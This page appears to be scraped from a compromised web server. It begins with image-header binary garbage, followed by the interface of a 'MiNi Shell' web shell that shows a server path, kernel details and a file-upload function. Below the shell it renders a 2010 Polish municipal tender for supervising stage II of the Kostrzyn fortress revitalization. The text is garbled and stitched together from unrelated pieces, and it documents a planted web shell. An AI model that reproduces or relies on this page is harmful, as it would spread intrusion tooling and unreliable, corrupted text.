JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100906/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100906/242589-N-2010.html

<p class="kh_header"><b>Kostrzyn: Nadzór nad sprawdzeniem prac projektowych i nadzór inwestorski nad realizacją zadania pn.: Rewitalizacja Twierdzy Kostrzyn - etap II</b><br>
<b>Numer ogłoszenia: 242589 - 2010; data zamieszczenia: 06.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto KOstrzyn nad Odrą , ul. Graniczna 2, 66-470 Kostrzyn, woj. lubuskie, tel. 95 727 81 47.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kostrzyn.um.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Nadzór nad sprawdzeniem prac projektowych i nadzór inwestorski nad realizacją zadania pn.: Rewitalizacja Twierdzy Kostrzyn - etap II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług związanych ze sprawdzeniem prac projektowych i nadzór inwestorski nad realizacją zadania pn.: Rewitalizacja Twierdzy Kostrzyn - etap II, obejmujących m.in:
1. - dokończenie remontu i adaptacji wnętrza schronu (kazamat) bastionu Filip oraz przystosowania go do potrzeb muzealno - wystawienniczych,
- remont fosy - oczyszczanie dna, pogłębianie, regulacja linii brzegowej, umocnienie brzegów przy pomocy grodzic z PVC,
- remont grodzy wraz z budową mechanizmu piętrzącego, odtworzeniem pomostu roboczego oraz ozdobnej wieżyczki Mnich, budowa ciągu pieszego o nawierzchni   z kostki granitowej wzdłuż brzegów fosy,
- piaskowanie i zabezpieczenie przeciwwilgociowe lica murów kurtynowych, czół                     i barków bastionów Filip i Brandenburgia,
- remont i uzupełnienie zniszczonych odcinków muru kurtynowego na odcinku od Bramy Chyżańskiej w kierunku nieistniejącego bastionu Księżniczka wraz                            z odtworzeniem historycznego profilu wału ziemnego,
- odtworzenie historycznego zagospodarowania tarasu bastionu Brandenburgia ( ciągi piesze, nasadzenia zieleni, oświetlenie zewnętrzne, schody terenowe, mała architektura - ławki , kosze na śmieci, barierki, stojaki na rowery, itp.),
- budowa ciągu pieszego - promenady (przywrócenie historycznego Kattewall) pomiędzy bastionem Filip a bastionem Brandenburgia, wraz z oświetleniem zewnętrznym i remontem korony murów kurtynowych,
- budowa iluminacji bastionów Filip, Brandenburgia oraz Bramy Chyżańskiej,
- remont mostu i fragmentów murów obronnych od strony fosy w sąsiedztwie Bramy Chyżańskiej,
oraz  zgodnie z zakresem określonym w programie funkcjonalno-użytkowym.

Wartość ryczałtowa prac projektowych i robót budowlanych, nad realizacją których prowadzony będzie nadzór nad sprawdzeniem prac projektowych i nadzór  inwestorski określona jest kwotą 6.986.000,00 zł. 
2. Zakres obowiązków i zadania inspektorów nadzoru nad sprawdzeniem prac projektowych               i nadzór inwestorski :
-  sprawdzanie na bieżąco prac projektowych wykonywanych przez projektantów oraz sprawdzenie opracowanej dokumentacji projektowej zgodnie z zakresem zawartym w  §1 w uzgodnieniu  z Zamawiającym oraz zgodnie z umową, SIWZ oraz obowiązującymi przepisami, 
-       realizacja praw i obowiązków, wynikających z ustawy z dnia 7 lipca 1994r. Prawo 
budowlane (Dz. U. z 2006r. Nr 156, poz. 1118 ze zmianami) wraz z przepisami wykonawczymi, ustawy o ochronie zabytków i opiece nad zabytkami wraz z przepisami wykonawczymi oraz z ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, (Dz.U. z 2010r. Nr 113 poz. 759) wraz z przepisami wykonawczymi, umowy o nadzór oraz umowy Wykonawcy z Zamawiającym, SIWZ, wiedzy technicznej, sztuki budowlanej oraz obowiązujących norm, 
-	obecność na terenie robót z częstotliwością uwzględniającą specyfikę realizowanych robót, jednakże nie rzadziej niż dwa razy w tygodniu w trakcie realizacji inwestycji,                  a także na wezwanie Wykonawcy realizującego prace projektowe, roboty budowlane oraz na wezwanie Zamawiającego,
-	pełnienie funkcji koordynacyjnych związanych z pracami projektowymi oraz na budowie,  organizowanie narad koordynacyjnych (Rada Budowy), sporządzanie protokołów                    z narad i przekazywanie ich zainteresowanym stronom,
-	organizowanie prac związanych z nadzorem tak, aby z tego tytułu nie było przerw                 w realizacji robot,  
-	uczestniczenie w naradach technicznych, problemowych i innych organizowanych przez wszystkie strony procesu inwestycyjnego, 
-	weryfikacja dokumentacji technicznej zadania, 
-	sprawowanie kontroli ilościowej i jakościowej w czasie realizacji zadania w zakresie  zabezpieczającym interesy Zamawiającego,
-	kontrolę zgodności wykonywanych robót z projektem budowlanym/wykonawczym Rewitalizacji twierdzy Kostrzyn - etap II, specyfikacją techniczną warunków wykonania   i odbioru robót, przedmiarami robót, kosztorysami nakładczymi  oraz wskazaniami do pielęgnacji oraz umową,
-	weryfikacje kosztorysów (kalkulacji) wykonawców robót pod względem rzeczowym, zgodności z obowiązującymi normami (nakładami rzeczowymi) oraz stosowania cen zgodnie z zawartą umową, 
-	dbanie o realizację robót w zgodności z harmonogramem rzeczowo - finansowym               i podejmowanie wszelkich działań umożliwiających prawidłową realizację harmonogramu robót,
-	sprawdzenie jakości wykonywanych robót i w przypadku konieczności powiadamianie wykonawcy robót o wykrytych wadach oraz poświadczenie usunięcia wad przez wykonawcę, ustalanie rodzaju i zakresu koniecznych do wykonania robót poprawkowych, 
-	zapobieganie zastosowaniu  wyrobów budowlanych wadliwych i nie dopuszczonych do obrotu i stosowania  w  budownictwie,
-	sprawdzenie posiadania przez wykonawcę robót odpowiednich dokumentów (atestów, certyfikatów, świadectw jakości, wyników badań itp.) dotyczących materiałów i urządzeń stosowanych przez wykonawcę oraz decydowanie o dopuszczeniu do stosowania lub odrzuceniu materiałów, prefabrykatów i wszystkich elementów oraz urządzeń przewidzianych do realizacji robót, żądanie wykonania dodatkowych badań przez  Wykonawcę robót, materiałów budzących wątpliwość co do jakości oraz akceptowanie receptur, technologii, zgodnie z wymaganiami dokumentacji projektowej oraz przepisami prawa,  
-	wydawanie poleceń, decyzji, opinii, zgody i akceptacji w formie ustnej i pisemnej, oraz udzielanie wykonawcy wszelkich wyjaśnień i wskazówek ( w przypadku konieczności po konsultacji z projektantem),
-	uzgadnianie z autorem projektu możliwości wprowadzenia rozwiązań zamiennych                w stosunku do przewidzianych w projekcie , jeżeli zaistnieje taka konieczność,
-	ponoszenie odpowiedzialności za realizacje robót zgodnie z warunkami ustalonymi             w zgłoszeniu robót budowlanych oraz w uzgodnieniach opiniujących realizację inwestycji i kontrola realizacji tych ustaleń przez wykonawcę robót budowlanych,
-	sprawdzania rozliczeń wykonawców robót budowlanych i potwierdzania należytych im kwot, kontrola prawidłowości fakturowania robót,
-	przygotowywanie opinii wraz z uzasadnieniem w przypadku spraw spornych                  z Wykonawcą oraz przedłożenie do rozstrzygnięcia Zamawiającemu,
-	spisywanie protokołów konieczności na roboty dodatkowe lub uzupełniające wspólnie           z   kierownikiem budowy i w uzgodnieniu z Zamawiającym,  
-	potwierdzenie faktycznie wykonanych robót oraz usunięcia wad i uczestniczenie              w   Komisji odbioru robót,
-	sprawdzenie i dokonywanie odbioru technicznego gotowych elementów, robót budowlanych ulegających zakryciu lub zanikających, odbioru częściowego,
-	poświadczenie terminu zakończenia robót, sprawdzenie kompletności i prawidłowości  dokumentacji powykonawczej,
-	stała współpraca w trakcie realizacji przedmiotu zamówienia z Zamawiającym, Wykonawcą prac projektowych, robót budowlanych oraz Nadzorem autorskim,
-	ustanowienie inspektorów sprawdzających prace projektowe wszystkich niezbędnych branż oraz zapewnienie ich udziału w odbiorze dokumentacji projektowej pod względem formalnym i merytorycznym, tj.:
a) Inspektor sprawdzający prace projektowe w specjalności architektonicznej - Inspektor koordynujący nadzór,
b) Inspektor sprawdzający prace projektowe w specjalności konstrukcyjno - budowlanej,
c) Inspektor sprawdzający prace projektowe w specjalności  instalacyjnej  w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych                                   i kanalizacyjnych 
d) Inspektor sprawdzający prace projektowe w specjalności instalacyjnej                                       w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych
e) Inspektor sprawdzający prace projektowe w specjalności mostowej
f)  Inspektor sprawdzający prace projektowe w specjalności konserwatorskiej

-	ustanowienie inspektorów nadzoru inwestorskiego wszystkich niezbędnych branż, tj.: 
a) Inspektor nadzoru inwestorskiego w branży konstrukcyjno - budowlanej - Inspektor koordynujący nadzór,
b) Inspektor nadzoru inwestorskiego  w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych  i kanalizacyjnych 
c) Inspektor nadzoru inwestorskiego w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych
d) Inspektor nadzoru inwestorskiego w specjalności mostowej,
e) Inspektor nadzoru inwestorskiego w specjalności konserwatorskiej.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.30.00.00-1, 71.24.80.00-8, 71.24.70.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 25.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/niespełnia..</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) wymagane jest wykazanie przez wykonawcę realizacji w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednej usługi związanej z przedmiotem zamówienia i do niego proporcjonalnych, polegającej na sprawdzeniu dokumentacji projektowych objętych jedną       z form ochrony zabytków określonych w art. 7 Ustawy z dnia 23 lipca 2003r.  o ochronie zabytków i opiece nad zabytkami ( Dz. U. z 2003r. Nr 162, poz 1568) obejmującym, branże: architektoniczną, konstrukcyjno - budowlaną, elektryczną, sanitarną, mostową, oraz                      w zakresie konserwatorskim, o wartości zadania zrealizowanego na podstawie ww. dokumentacji projektowej nie mniejszej niż 4.000.000,00 zł
Doświadczenie wykonawcy, o którym mowa w ppkt. a powinno zostać potwierdzone dokumentami, z których wynika odpowiednio, że  usługi zostały wykonane  należycie. 

 b) wymagane jest wykazanie przez wykonawcę realizacji w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednej usługi związanej z przedmiotem zamówienia i do niego proporcjonalnych, polegającej na nadzorze inwestorskim nad robotami budowlanymi przy zabytkach, lub posiadającym zaświadczenie od Wojewódzkiego Konserwatora Zabytków o nadzorowaniu prac przy zabytkach nieruchomych w branżach: architektonicznej, konstrukcyjno - budowlanej, elektrycznej, sanitarnej, mostowej, oraz w zakresie konserwatorskim,  o wartości zrealizowanych robót budowlanych nie mniejszej niż 4.000.000,00 zł.
Doświadczenie wykonawcy, o którym mowa w ppkt. b powinno zostać potwierdzone dokumentami, z których wynika odpowiednio, że  usługi zostały wykonane  należycie. 

 Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/niespełnia..</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) wymagane jest wykazanie przez wykonawcę, że będzie dysponował osobami zdolnymi do wykonania przedmiotu zamówienia tj.:

- Inspektor sprawdzający prace projektowe w specjalności architektonicznej - Inspektor koordynujący nadzór 
kwalifikacje: wykształcenie wyższe techniczne, uprawnienia budowlane do projektowania bez ograniczeń w specjalności architektonicznej, lub odpowiadającymi im, ważnymi uprawnieniami budowlanymi, wydanymi na podstawie wcześniej obowiązujących przepisów, posiadający aktualne członkostwo we właściwej izbie samorządu zawodowego,
doświadczenie zawodowe: co najmniej 3 lata doświadczenia zawodowego w projektowaniu w w/w specjalności potwierdzone dokumentami, z których wynika odpowiednio, że  usługi zostały wykonane  należycie. 

 - Inspektor sprawdzający prace projektowe w specjalności konstrukcyjno-budowlanej
kwalifikacje: wykształcenie wyższe techniczne, uprawnienia budowlane do projektowania bez ograniczeń w specjalności konstrukcyjno-budowlanej lub odpowiadającymi im, ważnymi uprawnieniami budowlanymi, wydanymi na podstawie wcześniej obowiązujących przepisów, posiadający aktualne członkostwo w Okręgowej Izbie Inżynierów Budownictwa,
doświadczenie zawodowe: co najmniej 3 lata doświadczenia zawodowego w projektowaniu w w/w specjalności potwierdzone dokumentami, z których wynika odpowiednio, że  usługi zostały wykonane  należycie. 

- Inspektor sprawdzający prace projektowe w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych                           i kanalizacyjnych 
kwalifikacje: wykształcenie wyższe techniczne, uprawnienia budowlane do projektowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych lub odpowiadającymi im, ważnymi uprawnieniami budowlanymi, wydanymi na podstawie wcześniej obowiązujących przepisów, posiadający aktualne członkostwo w Okręgowej Izbie Inżynierów Budownictwa,
doświadczenie zawodowe: co najmniej 3 lata doświadczenia zawodowego w projektowaniu w w/w specjalności potwierdzone dokumentami, z których wynika odpowiednio, że  usługi zostały wykonane  należycie. 

- Inspektor  sprawdzający prace projektowe w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych
 kwalifikacje: wykształcenie wyższe techniczne, uprawnienia budowlane do projektowania  bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub odpowiadającymi im, ważnymi uprawnieniami budowlanymi, wydanymi na podstawie wcześniej obowiązujących przepisów, posiadający aktualne członkostwo w Okręgowej Izbie Inżynierów Budownictwa 
doświadczenie zawodowe: co najmniej 3 lata doświadczenia zawodowego w projektowaniu w w/w specjalności potwierdzone dokumentami, z których wynika odpowiednio, że  usługi zostały wykonane  należycie. 

- Inspektor sprawdzający prace projektowe w specjalności mostowej
kwalifikacje: wykształcenie wyższe techniczne, uprawnienia budowlane do projektowania bez ograniczeń w specjalności mostowej lub odpowiadającymi im, ważnymi uprawnieniami budowlanymi, wydanymi na podstawie wcześniej obowiązujących przepisów, posiadający aktualne członkostwo w Okręgowej Izbie Inżynierów Budownictwa,
doświadczenie zawodowe: co najmniej 3 lata doświadczenia zawodowego w projektowaniu w w/w specjalności potwierdzone dokumentami, z których wynika odpowiednio, że  usługi zostały wykonane  należycie. 

- Inspektor sprawdzający prace projektowe w zakresie konserwatorskim
 Kwalifikacje i doświadczenie: zgodnie z Rozporządzeniem Ministra Kultury z dnia 9 czerwca 2004r. (Dz.U. z 2004r. Nr 150 poz. 1579) w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych

b) wymagane jest wykazanie przez wykonawcę, że będzie dysponował osobami zdolnymi do wykonania przedmiotu zamówienia tj.:

- Inspektor nadzoru w specjalności konstrukcyjno-budowlanej - Inspektor koordynujący nadzór 
kwalifikacje: wykształcenie wyższe techniczne, uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej, lub odpowiadającymi im, ważnymi uprawnieniami budowlanymi, wydanymi na podstawie wcześniej obowiązujących przepisów, posiadający aktualne członkostwo w Okręgowej Izbie Inżynierów Budownictwa,
doświadczenie zawodowe: co najmniej 3 lata doświadczenia zawodowego w pełnieniu funkcji Inspektora Nadzoru Inwestorskiego w w/w specjalności potwierdzone dokumentami,       z których wynika odpowiednio, że  usługi zostały wykonane  należycie

- Inspektor nadzoru w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych
kwalifikacje: wykształcenie wyższe techniczne, uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych lub odpowiadającymi im, ważnymi uprawnieniami budowlanymi, wydanymi na podstawie wcześniej obowiązujących przepisów, posiadający aktualne członkostwo w Okręgowej Izbie Inżynierów Budownictwa,
doświadczenie zawodowe: co najmniej 3 lata doświadczenia zawodowego w pełnieniu funkcji Inspektora Nadzoru Inwestorskiego,  w w/w specjalności potwierdzone dokumentami, z których wynika odpowiednio, że  usługi zostały wykonane  należycie

- Inspektor nadzoru w specjalności  instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych
 kwalifikacje: wykształcenie wyższe techniczne, uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub odpowiadającymi im, ważnymi uprawnieniami budowlanymi, wydanymi na podstawie wcześniej obowiązujących przepisów, posiadający aktualne członkostwo w Okręgowej Izbie Inżynierów Budownictwa 
doświadczenie zawodowe: co najmniej 3 lata doświadczenia zawodowego w pełnieniu funkcji Inspektora Nadzoru Inwestorskiego  w w/w specjalności potwierdzone dokumentami, z których wynika odpowiednio, że  usługi zostały wykonane  należycie

- Inspektor nadzoru w specjalności mostowej
kwalifikacje: wykształcenie wyższe techniczne, uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności mostowej lub odpowiadającymi im, ważnymi uprawnieniami budowlanymi, wydanymi na podstawie wcześniej obowiązujących przepisów, posiadający aktualne członkostwo w Okręgowej Izbie Inżynierów Budownictwa,
doświadczenie zawodowe: co najmniej 3 lata doświadczenia zawodowego w pełnieniu funkcji Inspektora Nadzoru Inwestorskiego,  w w/w specjalności potwierdzone dokumentami, z których wynika odpowiednio, że  usługi zostały wykonane  należycie,



- Inspektor nadzoru w zakresie konserwatorskim
 Kwalifikacje i doświadczenie: zgodnie z Rozporządzeniem Ministra Kultury z dnia 9 czerwca 2004r.(Dz.U. z 2004r. Nr 150 poz. 1579) w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych.

4) sytuacji ekonomicznej i finansowej, a) wymagane jest wykazanie przez wykonawcę posiadania opłaconej polisy a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej 100.000 zł.

2.Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji z momentem złożenia oferty zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 
3. Wykonawcy, którzy nie wykażą spełnienia warunków udziału w postępowaniu podlegać będą wykluczeniu z udziału w postępowaniu.  4. Z udziału w niniejszym postępowaniu wyklucza się wykonawców, którzy podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 Prawa zamówień publicznych. 5. Ofertę wykonawcy wykluczonego uważa się za odrzuconą. 6. Zamawiający odrzuca ofertę, jeżeli: 1)	jest niezgodną z ustawą. 2)	jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia,                       z zastrzeżeniem art. 87 ust. 2 pkt. 3 Prawa zamówień publicznych. 3)	jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów                         o zwalczaniu nieuczciwej konkurencji. 4)	zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia. 5)	została złożona przez wykonawcę wykluczonego z udziału w postępowaniu                      o udzielenie zamówienia. 6)	zawiera błędy w obliczeniu ceny. 7)	wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się                 na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt. 3 Prawa zamówień publicznych 8)	jest nieważna na podstawie odrębnych przepisów,  7. Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu               o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/niespełna.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane jest wykazanie przez wykonawcę posiadania opłaconej polisy a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej 100.000 zł. Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/niespełnia..</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

